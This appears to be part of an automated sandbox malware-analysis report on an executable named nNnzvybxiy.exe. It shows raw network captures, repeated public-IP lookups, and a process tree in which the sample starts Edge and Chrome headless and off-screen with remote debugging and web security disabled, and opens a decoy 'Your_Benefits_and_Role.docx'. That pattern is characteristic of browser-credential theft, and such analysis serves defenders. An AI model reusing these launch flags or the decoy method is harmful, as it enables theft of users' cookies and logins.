                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC1369INData Raw: 00 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 80 79 0a 00 48 8b d9 74 0d c6 41 0a 00 48 8b 49 38 e8 04 9f 01 00 48 8b cb e8 0c f8 0a 00 48 8b cb 48 83 c4 20 5b e9 6f 03 0b 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 56 48 83 ec 20 0f b6 41 09 45 33 c0 4c 8b f2 48 8b d9 84 c0 74 06 48 8d 79 40 eb 0f 44 39 41 24 74 06 48 8b 79 30 eb 03 49 8b f8 be 0c 00 00 00 48 8b c8 48 2b f0 4c 39 04 f3 4c 8d 0c f3 75 26 b8 01 00 00 00 3b c1 74 0a 48 8b 43 30 48 8b 50 08 eb 04 48 8b 53 48 48 8b 0b e8 d1 d7 09 00 44 8b c0 85 c0 75 44 48 85 ff 74 3c 48 8b 04 f3 44 0f b6 4f 12 48 8b 50 18 0f b6 4a 02 0f b6 42 03 c1 e1 08 03 c8 44 3b c9 72 07 b8 04 00 00 00 eb 19 48 8b 03 0f b6 48 27
                                                                                                                                                                                                                            Data Ascii: 3H [@SH yHtAHI8HHH [oH\$Ht$H|$AVH AE3LHtHy@D9A$tHy0IHH+L9Lu&;tHC0HPHSHHDuDHt<HDOHPJBD;rHH'
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC1369INData Raw: 24 58 33 d2 48 8b e8 4c 89 70 08 c6 40 11 01 4c 8b 4e 18 45 0f b6 51 02 41 0f b6 49 03 41 c1 e2 08 44 03 d1 74 22 45 0f b6 5d 27 45 33 c0 49 63 c0 4a 8b 4c 08 04 48 0f c9 48 3b cf 74 18 ff c2 45 03 c3 41 3b d2 7c e6 bb 0b 01 00 00 44 88 7d 12 e9 df 04 00 00 44 8b fa 33 db 44 88 7d 12 e9 d1 04 00 00 45 33 c0 4c 8d 8c 24 a0 00 00 00 49 8b cd 41 8d 50 01 e8 c3 d2 09 00 8b d8 85 c0 75 4d 0f 57 f6 85 ff 0f 8e 49 04 00 00 48 89 7c 24 20 e8 58 a1 12 00 85 c0 74 0c 49 89 6c 24 18 41 89 7c 24 10 eb 23 48 8d 1c 7f 48 c1 e3 03 48 8b cb e8 58 08 0f 00 49 89 44 24 18 41 89 7c 24 10 48 85 c0 0f 85 d0 00 00 00 bb 07 00 00 00 48 8b bc 24 a0 00 00 00 48 85 ff 0f 84 56 04 00 00 83 6f 10 01 0f 85 4c 04 00 00 41 ff 4d 5c 48 83 7f 08 01 75 08 41 c7 45 2c ff ff ff ff 48 8b 17
                                                                                                                                                                                                                            Data Ascii: $X3HLp@LNEQAIADt"E]'E3IcJLHH;tEA;|D}D3D}E3L$IAPuMWIH|$ XtIl$A|$#HHHXID$A|$HH$HVoLAM\HuAE,H
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC1369INData Raw: c4 60 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc cc cc cc cc 48 89 5c 24 20 48 89 54 24 10 56 57 41 54 41 55 41 57 48 83 ec 20 8b 59 14 4d 8b e1 44 8b 51 10 4d 8b e8 48 8b 71 08 48 8b f9 41 3b da 0f 8d 7f 00 00 00 8b c3 4c 8d 05 d4 3e 16 00 0f 1f 40 00 8b d3 8b d8 48 63 c2 48 0f be 0c 30 84 c9 78 1c 83 f9 30 7c 08 42 80 7c 01 d0 00 75 0f 8d 5a 01 89 5f 14 8b d3 8b c3 41 3b da 7c d6 4c 63 fb 41 3b da 7d 32 8b d3 66 66 0f 1f 84 00 00 00 00 00 48 63 c2 48 0f be 0c 30 84 c9 78 0d 83 f9 30 7c 15 42 80 7c 01 d0 00 74 0d 8d 5a 01 89 5f 14 8b d3 41 3b da 7c da 8b c3 41 3b df 7f 1c 41 3b da 7c 8e b8 65 00 00 00 48 8b 5c 24 68 48 83 c4 20 41 5f 41 5d 41 5c 5f 5e c3 41 2b df 48 89 6c 24 50 4c 89 74 24 60 3b 5f 28 7e 27 4c 8b 77 20 8d 6b 14 89 6f 28 e8 96 9b 12 00
                                                                                                                                                                                                                            Data Ascii: `A_A^A]A\_^]H\$ HT$VWATAUAWH YMDQMHqHA;L>@HcH0x0|B|uZ_A;|LcA;}2ffHcH0x0|B|tZ_A;|A;A;|eH\$hH A_A]A\_^A+Hl$PLt$`;_(~'Lw ko(
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC1369INData Raw: f8 19 76 0c 48 8d 42 9f 48 83 f8 19 8b c1 77 05 b8 01 00 00 00 85 c0 0f 95 c0 fe c8 41 88 44 11 08 48 ff c2 48 81 fa 80 00 00 00 7c c3 4c 89 0e 33 c0 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 8b 5c 24 30 b8 07 00 00 00 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc 48 89 5c 24 18 48 89 74 24 20 48 89 54 24 10 57 41 54 41 55 41 56 41 57 48 83 ec 20 8b 59 14 4d 8b e1 44 8b 51 10 4d 8b e8 4c 8b 19 48 8b f2 4c 8b 71 08 48 8b f9 41 3b da 7d 73 8b c3 0f 1f 00 8b d3 8b d8 0f 1f 40 00 0f 1f 84 00 00 00 00 00 48 63 c2 42 0f b6 0c 30 80 f9 80 73 15 42 80 7c 19 08 00 74 0d 8d 5a 01 89 5f 14 8b d3 41 3b da 7c de 4c 63 fb 41 3b da 7d 28 8b d3 0f 1f 40 00 48 63 c2 42 0f b6 0c 30 80 f9 80 73 08 42 80 7c 19 08 00 75 0d 8d 5a 01 89 5f 14 8b d3 41 3b da 7c de 8b
                                                                                                                                                                                                                            Data Ascii: vHBHwADHH|L3H\$0Ht$8H _H\$0Ht$8H _H\$Ht$ HT$WATAUAVAWH YMDQMLHLqHA;}s@HcB0sB|tZ_A;|LcA;}(@HcB0sB|uZ_A;|
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC1369INData Raw: 48 89 7b 20 48 89 7b 28 48 89 7b 30 89 7b 18 e8 4f 25 01 00 48 8b 5c 24 30 33 c0 48 83 c4 20 5f c3 cc cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 54 41 56 41 57 48 83 ec 40 ff 41 18 48 8d 71 34 48 8b 01 4c 8d 71 30 48 8b d9 48 89 74 24 28 4c 8d 49 2c 4c 89 74 24 20 4c 8d 41 28 48 8b 40 18 48 8d 51 20 48 8b 49 10 48 8b 40 28 ff 15 c9 1c 16 00 8b f8 85 c0 74 53 48 8b 4b 10 4c 89 6c 24 70 45 33 ed 48 85 c9 74 15 48 8b 03 48 8b 50 18 48 8b 42 20 ff 15 a1 1c 16 00 4c 89 6b 10 48 8b 4b 08 e8 bc 24 01 00 83 ff 65 4c 89 6b 08 4c 89 6b 20 41 0f 44 fd 4c 89 6b 28 45 89 2e 8b c7 44 89 2e 44 89 6b 18 4c 8b 6c 24 70 48 8b 5c 24 78 48 8b ac 24 80 00 00 00 48 83 c4 40 41 5f 41 5e 41 5c 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89
                                                                                                                                                                                                                            Data Ascii: H{ H{(H{0{O%H\$03H _H\$Hl$VWATAVAWH@AHq4HLq0HHt$(LI,Lt$ LA(H@HQ HIH@(tSHKLl$pE3HtHHPHB LkHK$eLkLk ADLk(E.D.DkLl$pH\$xH$H@A_A^A\_^H\$Hl$H
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC1369INData Raw: 8b f1 44 8b e5 44 8b c5 89 6c 24 20 39 69 5c 74 0a b8 06 02 00 00 e9 bc 07 00 00 ff 41 48 0f 57 c0 48 89 9c 24 28 01 00 00 49 b9 ff ff ff ff ff ff ff 7f 48 89 bc 24 e8 00 00 00 48 8d 1d a8 d3 ff ff 4c 89 ac 24 e0 00 00 00 49 bd 00 00 00 00 00 00 00 80 0f 29 b4 24 d0 00 00 00 0f 29 bc 24 c0 00 00 00 44 0f 29 84 24 b0 00 00 00 44 0f 29 8c 24 a0 00 00 00 44 0f 29 94 24 90 00 00 00 f2 44 0f 10 15 32 5e 17 00 44 0f 29 9c 24 80 00 00 00 f2 44 0f 10 1d a0 5e 17 00 0f 11 44 24 40 0f 11 44 24 50 0f 11 44 24 60 83 fa 01 0f 8e 71 03 00 00 0f b6 46 25 8d 4a fc 3b c8 0f 4e c1 4c 63 f8 4c 89 7c 24 28 40 38 6e 26 0f 85 38 01 00 00 44 8b f5 85 c0 0f 8e 42 02 00 00 48 8b 7c 24 30 48 8b dd f2 44 0f 10 05 c6 5c 17 00 48 83 c7 20 f2 44 0f 10 0d a9 5c 17 00 0f 57 ff 48 8b 4f
                                                                                                                                                                                                                            Data Ascii: DDl$ 9i\tAHWH$(IH$HL$I)$)$D)$D)$D)$D2^D)$D^D$@D$PD$`qF%J;NLcL|$(@8n&8DBH|$0HD\H D\WHO
                                                                                                                                                                                                                            2025-01-14 11:48:36 UTC1369INData Raw: 24 28 45 33 c0 48 8d 54 24 40 48 8b ce e8 6f 76 02 00 44 8b e0 85 c0 0f 85 0a 02 00 00 8b 46 20 44 0f b6 46 27 83 e8 04 48 8b 5c 24 28 99 41 f7 f8 48 8b 53 18 0f b6 4a 02 44 0f b6 4a 03 c1 e1 08 44 03 c9 44 3b c8 0f 8d 46 01 00 00 48 8b 44 24 40 45 0f af c1 48 0f c8 41 8b c8 44 8b c5 48 03 ca 48 89 41 04 48 83 c1 0c 40 38 6e 25 76 2c 48 8d 54 24 48 0f 1f 40 00 0f 1f 84 00 00 00 00 00 8b 02 48 8d 49 04 0f c8 89 41 fc 48 8d 52 04 0f b6 46 25 41 ff c0 44 3b c0 7c e5 48 8b 4b 18 41 8d 51 01 8b c2 c1 e8 08 88 41 02 88 51 03 c7 43 14 01 00 00 00 4c 8d 44 24 40 48 8b d3 48 8b ce e8 fb 72 02 00 44 8b e0 85 c0 75 14 4c 8b 43 08 48 8b ce 48 8b 54 24 40 e8 a3 b5 0a 00 44 8b e0 83 6b 10 01 8b fd 0f 85 d4 00 00 00 ff 4e 5c 48 83 7b 08 01 75 07 c7 46 2c ff ff ff ff 48
                                                                                                                                                                                                                            Data Ascii: $(E3HT$@HovDF DF'H\$(AHSJDJDD;FHD$@EHADHHAH@8n%v,HT$H@HIAHRF%AD;|HKAQAQCLD$@HHrDuLCHHT$@DkN\H{uF,H


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            22192.168.2.749864172.67.74.1524435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:38 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                                                                                            2025-01-14 11:48:38 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:38 GMT
                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 901d65ecbd7e4225-EWR
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1727&rtt_var=664&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1627647&cwnd=235&unsent_bytes=0&cid=3960cf1adc9e3be4&ts=161&x=0"
                                                                                                                                                                                                                            2025-01-14 11:48:38 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                            Data Ascii: 8.46.123.189


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            23192.168.2.749868172.67.74.1524435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:39 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                                                                                            2025-01-14 11:48:39 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:39 GMT
                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 901d65f06f5f7279-EWR
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1943&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1445544&cwnd=220&unsent_bytes=0&cid=8147cea19007f5b5&ts=132&x=0"
                                                                                                                                                                                                                            2025-01-14 11:48:39 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                            Data Ascii: 8.46.123.189


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            24192.168.2.749875172.67.74.1524435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:40 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                                                                                            2025-01-14 11:48:40 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:40 GMT
                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 901d65f7293943a3-EWR
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1696&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1658148&cwnd=229&unsent_bytes=0&cid=13855cd268890f7c&ts=142&x=0"
                                                                                                                                                                                                                            2025-01-14 11:48:40 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                            Data Ascii: 8.46.123.189


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            25192.168.2.749880172.67.74.1524435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:40 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                                                                                            2025-01-14 11:48:40 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:40 GMT
                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 901d65fafd500fa5-EWR
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1653&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1745367&cwnd=190&unsent_bytes=0&cid=784a34bd50507880&ts=147&x=0"
                                                                                                                                                                                                                            2025-01-14 11:48:40 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                            Data Ascii: 8.46.123.189


                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:06:48:08
                                                                                                                                                                                                                            Start date:14/01/2025
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\nNnzvybxiy.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff677f90000
                                                                                                                                                                                                                            File size:26'467'328 bytes
                                                                                                                                                                                                                            MD5 hash:5A59FDC67B0A65A89AD3F08DE212D442
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:06:48:09
                                                                                                                                                                                                                            Start date:14/01/2025
                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                                                            Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:06:48:09
                                                                                                                                                                                                                            Start date:14/01/2025
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9764 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                                                            Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:06:48:09
                                                                                                                                                                                                                            Start date:14/01/2025
                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1540 --field-trial-handle=1452,i,14790170528121727049,14815104510024520217,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                                                            Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:06:48:10
                                                                                                                                                                                                                            Start date:14/01/2025
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1588 --field-trial-handle=1492,i,15216651291747389405,13479732914116494807,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8
                                                                                                                                                                                                                            Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:06:48:10
                                                                                                                                                                                                                            Start date:14/01/2025
                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
                                                                                                                                                                                                                            Imagebase:0x750000
                                                                                                                                                                                                                            File size:1'620'872 bytes
                                                                                                                                                                                                                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:1.2%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:18.4%
                                                                                                                                                                                                                              Total number of Nodes:719
                                                                                                                                                                                                                              Total number of Limit Nodes:105
                                                                                                                                                                                                                              execution_graph 106889 7ffb0c686570 106892 7ffb0c761b00 106889->106892 106891 7ffb0c686597 106893 7ffb0c761b7e 106892->106893 106896 7ffb0c761b2b 106892->106896 106894 7ffb0c761b9e 106893->106894 106893->106896 106897 7ffb0c761b43 106894->106897 106902 7ffb0c761ba3 _raise_excf 106894->106902 106946 7ffb0c698730 11 API calls _raise_excf 106896->106946 106947 7ffb0c698730 11 API calls _raise_excf 106897->106947 106899 7ffb0c761b6d 106899->106891 106901 7ffb0c761c31 _raise_excf 106903 7ffb0c761c70 106901->106903 106949 7ffb0c69ee90 11 API calls _raise_excf 106901->106949 106902->106901 106906 7ffb0c76baa0 106902->106906 106948 7ffb0c76e910 11 API calls 2 library calls 106902->106948 106903->106891 106907 7ffb0c76bb0f new[] 106906->106907 106908 7ffb0c76bb89 106907->106908 106922 7ffb0c76bba7 _raise_excf 106907->106922 106970 7ffb0c738ea0 11 API calls _raise_excf 106908->106970 106910 7ffb0c76bc7b 106912 7ffb0c76bc97 106910->106912 106971 7ffb0c78ec40 106910->106971 106911 7ffb0c76bb9a _raise_excf 106989 7ffb0c7655a0 11 API calls _raise_excf 106911->106989 106913 7ffb0c76bdc1 106912->106913 106917 7ffb0c76bcae 106912->106917 106950 7ffb0c770440 106913->106950 106919 7ffb0c76bcb7 106917->106919 106924 7ffb0c76bd04 _raise_excf 106917->106924 106918 7ffb0c76c0b6 _raise_excf 106918->106902 106976 7ffb0c739000 11 API calls _raise_excf 106919->106976 106921 7ffb0c76bccb 106977 7ffb0c69ee90 11 API calls _raise_excf 106921->106977 106922->106910 106927 7ffb0c76bcdf 106922->106927 106926 7ffb0c76bd64 _raise_excf 106924->106926 106936 7ffb0c770440 _raise_excf 12 API calls 106924->106936 106925 7ffb0c76bf76 106925->106911 106988 7ffb0c7a28b0 11 API calls _raise_excf 106925->106988 106926->106925 106928 7ffb0c76be79 106926->106928 106934 7ffb0c76be54 106926->106934 106978 7ffb0c739000 11 API calls _raise_excf 106927->106978 106928->106934 106983 7ffb0c7222f0 32 API calls _raise_excf 106928->106983 106930 7ffb0c76beba 106931 7ffb0c76bf50 106930->106931 106932 7ffb0c76becc 106930->106932 106931->106911 106987 7ffb0c738e50 11 API calls _raise_excf 106931->106987 106986 7ffb0c739000 11 API calls _raise_excf 106932->106986 106933 7ffb0c76beb2 106985 7ffb0c77eeb0 11 API calls _raise_excf 106933->106985 106934->106930 106934->106933 106984 7ffb0c78cc90 36 API calls _raise_excf 106934->106984 106943 7ffb0c76bd45 106936->106943 106942 7ffb0c76bedd 106942->106911 106945 7ffb0c684c20 _raise_excf 11 API calls 106942->106945 106943->106926 106979 7ffb0c684c20 106943->106979 106945->106911 106946->106897 106947->106899 106948->106902 106949->106903 106960 7ffb0c770490 _raise_excf 106950->106960 106952 7ffb0c7707e1 _raise_excf 106953 7ffb0c684c20 _raise_excf 11 API calls 106952->106953 106959 7ffb0c770839 106952->106959 106953->106959 106954 7ffb0c7708fc 107006 7ffb0c698730 11 API calls _raise_excf 106954->107006 106955 7ffb0c770919 106957 7ffb0c684c20 _raise_excf 11 API calls 106955->106957 106965 7ffb0c770932 106957->106965 106958 7ffb0c7708a5 107004 7ffb0c738ea0 11 API calls _raise_excf 106958->107004 106959->106954 106959->106955 107005 7ffb0c761f90 11 API calls _raise_excf 106959->107005 106960->106952 106960->106958 106990 7ffb0c765f60 106960->106990 106961 7ffb0c77095f 106968 7ffb0c77097c 106961->106968 107008 7ffb0c737590 11 API calls _raise_excf 106961->107008 106964 7ffb0c77099a _raise_excf 106964->106926 106965->106961 107007 7ffb0c6ae530 11 API calls _raise_excf 106965->107007 106968->106964 106969 7ffb0c684c20 _raise_excf 11 API calls 106968->106969 106969->106964 106970->106911 106972 7ffb0c78ed1a 106971->106972 106974 7ffb0c78ec56 _raise_excf 106971->106974 106972->106912 106974->106972 106975 7ffb0c684c20 _raise_excf 11 API calls 106974->106975 107014 7ffb0c78e800 11 API calls _raise_excf 106974->107014 106975->106974 106976->106921 106977->106911 106978->106911 106980 7ffb0c684c29 106979->106980 106981 7ffb0c684c84 106979->106981 106980->106981 107015 7ffb0c7c996c 106980->107015 106981->106926 106983->106934 106984->106933 106985->106930 106986->106942 106987->106911 106988->106911 106989->106918 106992 7ffb0c765fa1 _raise_excf 106990->106992 106991 7ffb0c76608e 106993 7ffb0c7660e8 106991->106993 106994 7ffb0c766098 106991->106994 106992->106991 107001 7ffb0c7660ad 106992->107001 107009 7ffb0c7b7490 12 API calls 2 library calls 106992->107009 106996 7ffb0c766117 106993->106996 106997 7ffb0c76612a 106993->106997 107002 7ffb0c7660c3 _raise_excf 106993->107002 106994->107002 107010 7ffb0c7b7490 12 API calls 2 library calls 106994->107010 107012 7ffb0c738ea0 11 API calls _raise_excf 106996->107012 107013 7ffb0c738ea0 11 API calls _raise_excf 106997->107013 107001->107002 107011 7ffb0c7b75d0 11 API calls _raise_excf 107001->107011 107002->106960 107004->106952 107005->106954 107006->106955 107007->106961 107008->106968 107009->106992 107010->107001 107011->107002 107012->107002 107013->107002 107014->106974 107016 7ffb0c7c99a0 107015->107016 107017 7ffb0c7c9971 RtlFreeHeap 107015->107017 107016->106981 107017->107016 107018 7ffb0c7c998c GetLastError 107017->107018 107019 7ffb0c7c9999 __free_lconv_mon 107018->107019 107021 7ffb0c7c9ec8 11 API calls 